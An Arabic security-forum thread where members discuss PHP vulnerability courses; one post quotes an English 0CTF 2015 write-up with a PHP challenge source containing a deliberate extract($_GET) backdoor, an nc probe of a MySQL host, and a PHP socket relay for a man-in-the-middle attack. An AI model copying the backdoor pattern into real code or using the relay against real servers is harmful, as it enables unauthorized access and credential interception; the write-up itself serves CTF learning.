Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]


4gud عضو نشيط
  • شكراً: 54
  • تم شكره 17 مرة في 13 مشاركة

السلام عليكم و الرحمة الله
الرائج هذه الايام لاسباب اكثرها مادي دورات تننهي ب 4 hacker لتفادي هذه السطحية في التعليم اقترح على الاخوة من يحيد php ان يقوم بنشر سكريبت يفيد في الحماية و نفس الوقت في الاختراق ؟؟

اي دورة الحماية/الاختراق ب Php .. لا اتحدث عن echo ,if ..else ..

القصد socket و $_FILE ... الضعف و الية الاستغلال

اتمنى ان تكون الفطرة قد وصلت

الأعضاء الذين قالوا شكراً لـ 4gud على المشاركة المفيدة:
UzunDz فريق الحماية للأبد
  • شكراً: 4517
  • تم شكره 5574 مرة في 1384 مشاركة

الـ php توجد لغة واحدة فقط لا عشرة .. الدورات بالمنتدى اثبتت ان الأشخاص غير مهتمين ببذل الجهد .. يفتح فمه وينتظر اللقمة الممضوغة تدخل وما عليه سوى بلعها ثم انتقاد من اوصلها اليه.

توقيع
./logout
12 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
selhab عضو نشيط
  • شكراً: 211
  • تم شكره 180 مرة في 41 مشاركة

المشاركة الأصلية كتبت بواسطة UzunDz اقتباس :
الـ php توجد لغة واحدة فقط لا عشرة .. الدورات بالمنتدى اثبتت ان الأشخاص غير مهتمين ببذل الجهد .. يفتح فمه وينتظر اللقمة الممضوغة تدخل وما عليه سوى بلعها ثم انتقاد من اوصلها اليه.
لا اوافقك الرأى ف على سبيل المثال دورة فارس و التى كانت تتكلم عن استغلال الثغرات و نقاط ضعف سكربتات ال web المبنية بلغة PHP حازت على اعجاب الكثير و الشكر التقدير من الكثير من الاعضاء

توقيع
mess with the best and die like the rest
4 أعضاء قالوا شكراً لـ selhab على المشاركة المفيدة:
Nani17
TeaM C
  • شكراً: 923
  • تم شكره 1035 مرة في 280 مشاركة

المشاركة الأصلية كتبت بواسطة UzunDz اقتباس :
الـ php توجد لغة واحدة فقط لا عشرة .. الدورات بالمنتدى اثبتت ان الأشخاص غير مهتمين ببذل الجهد .. يفتح فمه وينتظر اللقمة الممضوغة تدخل وما عليه سوى بلعها ثم انتقاد من اوصلها اليه.
أول دورة اكتشاف ثغرات اقيمت في المنتدى كنت من المشاركين بها
لكن لم أستطع إكمال نشاطي فيها بسبب الأوضاع بسوريا وتم طردي

استفدت كثيراً شخصياً ودخلت في مجال الفحص من بعد هذه الدورة والحمدلله وفُقّتٌ بنتائج جيدة

توقيع
------------------------------

يـا رَبّ
2 أعضاء قالوا شكراً لـ Nani17 على المشاركة المفيدة:
UzunDz فريق الحماية للأبد
  • شكراً: 4517
  • تم شكره 5574 مرة في 1384 مشاركة

المشاركة الأصلية كتبت بواسطة selhab اقتباس :
لا اوافقك الرأى ف على سبيل المثال دورة فارس و التى كانت تتكلم عن استغلال الثغرات و نقاط ضعف سكربتات ال web المبنية بلغة php حازت على اعجاب الكثير و الشكر التقدير من الكثير من الاعضاء
المشاركة الأصلية كتبت بواسطة nani17 اقتباس :
أول دورة اكتشاف ثغرات اقيمت في المنتدى كنت من المشاركين بها
لكن لم أستطع إكمال نشاطي فيها بسبب الأوضاع بسوريا وتم طردي

استفدت كثيراً شخصياً ودخلت في مجال الفحص من بعد هذه الدورة والحمدلله وفُقّتٌ بنتائج جيدة
انا قصدت الدورات الخاصة بلغات البرمجة وليس المسابقات..
مثال ليس ببعيد دورة لغة البيرل ..

توقيع
./logout
الأعضاء الذين قالوا شكراً لـ UzunDz على المشاركة المفيدة:
4gud عضو نشيط
  • شكراً: 54
  • تم شكره 17 مرة في 13 مشاركة

ساعطيك مثال :

هدا كود و جدته و انا ابحث في النت كيفية استغلال التغراث php كما يتم استغلال كما Bof ههه :

## Write-up

This task is a web task worth 250 points from the 0CTF 2015.
There is an input field, and two buttons : Login and FLAG.<br>
FLAG gives us the source code of the task, without the db credentials :

```php
<?php
if (isset($_GET['view-source'])) {
show_source(__FILE__);
exit();
}
include("./inc.php"); // key & database config

function err($str){ die("<استبدال script>alert(\"$str\");window.location.href= './';</استبدال script>"); }

$nonce = mt_rand();

extract($_GET); // this is my backdoor

if (empty($_POST['key'])) {

err("Parameter Missing!");
}

if ($_POST['key'] !== $key) {
err("You Are Not Authorized!");
}

$conn = mysql_connect($host, $user, $pass);

if (!$conn) {
err("Database Error, Please Contact with GameMaster!");
}

$query = isset($_POST['query']) ? bin2hex($_POST['query']) : "SELECT flag FROM forward.flag";
$res = mysql_query($query);
if (FALSE == $res) {
err("Database Error, Please Contact with GameMaster!");
}

$row = mysql_fetch_array($res);

if ($debug) {
echo "HOST:\t{$host}<br/>";
echo "USER:\t{$user}<br/>";
}

echo "<del>FLAG:\t0ctf{</del>" . sha1($nonce . md5($row['flag'])) . "<del>}</del><br/>"; // not real flag

mysql_close($conn);
?>
```
<br><br>
At this point, I was a bit sad, because I wanted to get the flag. <br>
After reading the source code, we can guess that we need to get our hands on $row['flag'].

There is also a HUGE hint : `this is my backdoor`.<br>
`extract` extracts variable from an array to the current scope.<br>
Exemple : extract(['foo' => 'bar']); is the same as $foo = 'bar';

We can use it to bypass the first check :
if `$_GET['key']` is set, `$key` will be set to it. (hence the backdoor)

Our first thought is that we can also use it to set nonce to '', so that the page outputs `sha1(md5($flag));`.<br>
This is pointless : we need to reverse a SHA1, then a MD5, and it would take forever.

We can set `$_GET['debug']` to 1, to gather informations about db host, and user :
```
HOST: 202.112.28.121
USER: forward
```
<br><br>
With `nc -vv 202.112.28.121 3306`, we can see the version of MySQL, and that it DOES accept connection from outside.<br>
We have no way to retrieve the password from the استبدال script. But we know that the استبدال script retrieves the flag.

Interesting thing :
`extract` is called after $host, $user and $pass definitions. It means we can also alter them.

I then made a استبدال script to set up a man-in-the-middle attack:<br>
- The web page (client) connects to my computer.<br>
- My computer connects to the MySQL server (server).<br>
- As soon as I read something on one of the sockets, I forward it to the other peer.

Here is the code :
```php
<?php
$socket = socket_create(2, 1, 0);
socket_bind($socket, 0, 3306);
socket_listen($socket);

$client = socket_accept($socket);

$server = socket_create(2, 1, 0);
socket_connect($server, '202.112.28.121', 3306);

socket_set_nonblock($client);
socket_set_nonblock($server);

while(true) {
$packet = socket_read($server, 4096);
if($packet) {
printf("S->C: %s\n", $packet);
socket_write($client, $packet);
}

$packet = socket_read($client, 4096);
if($packet) {
printf("S<-C: %s\n", $packet);
socket_write($server, $packet);
}
usleep(1e4);
}
?>

Mr SiLv3r عضو نشيط
  • شكراً: 228
  • تم شكره 87 مرة في 25 مشاركة

فعلا يا ريت القائمين علي الموقع يشوفو الفكره دي لان في ناس مبتدئه عايزه تتعلم

توقيع
Personal E-Mail : [email protected]
Contact me : PM Me
UzunDz فريق الحماية للأبد
  • شكراً: 4517
  • تم شكره 5574 مرة في 1384 مشاركة

المشاركة الأصلية كتبت بواسطة mr silv3r اقتباس :
فعلا يا ريت القائمين علي الموقع يشوفو الفكره دي لان في ناس مبتدئه عايزه تتعلم
يمكن لاي شخص طرح مواضيع يساعد فيها المبتدئين .. ليس بالضرورة اشخاص من القائمين على الموقع.

توقيع
./logout
الأعضاء الذين قالوا شكراً لـ UzunDz على المشاركة المفيدة:
UzunDz فريق الحماية للأبد
  • شكراً: 4517
  • تم شكره 5574 مرة في 1384 مشاركة

المشاركة الأصلية كتبت بواسطة wezx اقتباس :
ساعطيك مثال :

هدا كود و جدته و انا ابحث في النت كيفية استغلال التغراث php كما يتم استغلال كما bof ههه :
اي شخص ملم بلغة ما يمكنه كشف الهفوات فيها. لذا الحل للتعمق في اكتشاف الثغرات هو التعمق في اللغة البرمجية المراد كشف الثغرات فيها .. غير ذلك تبقى في حلقة مفرغة.

الكود يلي وضغته عبارة عن ctf ,, ولعب مثل هذه التحديات يزيد في مستوى الشخص ونوهنا الى ذلك فأكثر من موضوع وفي اكثر من مناسبة..

كخلاصة بسيطة : العقلية الرائجة ما تسمح بالتعلم وكمثال قريب مسابقة الحماية للأبد .. المنظم يقول لا داعي لإستخدام ادوات ثم تجد السيرفر يسقط جراء استخدامها.

وكيما يقول المثل الشعبي : خلي البئر بغطاه.

توقيع
./logout
7 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
ViRuS_HaCkErS عضو نشيط
  • شكراً: 120
  • تم شكره 7 مرة في 7 مشاركة

المشاركة الأصلية كتبت بواسطة uzundz اقتباس :
اي شخص ملم بلغة ما يمكنه كشف الهفوات فيها. لذا الحل للتعمق في اكتشاف الثغرات هو التعمق في اللغة البرمجية المراد كشف الثغرات فيها .. غير ذلك تبقى في حلقة مفرغة.

الكود يلي وضغته عبارة عن ctf ,, ولعب مثل هذه التحديات يزيد في مستوى الشخص ونوهنا الى ذلك فأكثر من موضوع وفي اكثر من مناسبة..

كخلاصة بسيطة : العقلية الرائجة ما تسمح بالتعلم وكمثال قريب مسابقة الحماية للأبد .. المنظم يقول لا داعي لإستخدام ادوات ثم تجد السيرفر يسقط جراء استخدامها.

وكيما يقول المثل الشعبي : خلي البئر بغطاه.

يعطيك العافيه صراحه يوجد بالمنتدى كثير من الاعضاء اللي مستواهم جميل جدا في اكتشاف الثغرات

وبلغه البرمجه وانا كنت من المشاركين في مسابقه اكتشاف الثغرات بس انا من فلسطين وفي مشاكل بالكهرباء فدخلت بعد يومين فوجئت انه تم ابعادي من المسابقه هل من الممكن انو تفتحو القسم بعد ان تم انهاء المسابقه للاعضاء للاستفاده لانو صراحه انا ستفدت كتير في طرق كتابه استغلال وطرق اكتشاف الثغرات وطب اكيد سبب وجود المنتدى هو افادة الاعضاء والمجتمع العربي فا يا ريت انو يتم فتح القسم لجميع الاعضاء ويعطيك العافيه

الأعضاء الذين قالوا شكراً لـ ViRuS_HaCkErS على المشاركة المفيدة:
أدوات الموضوع
انواع عرض الموضوع


Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.

:: Security By : Sec4ever Team ::

جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever
جميع الحقوق محفوظة الحماية للأبد -Security 4 Ever
Sec4ever by Sec4ever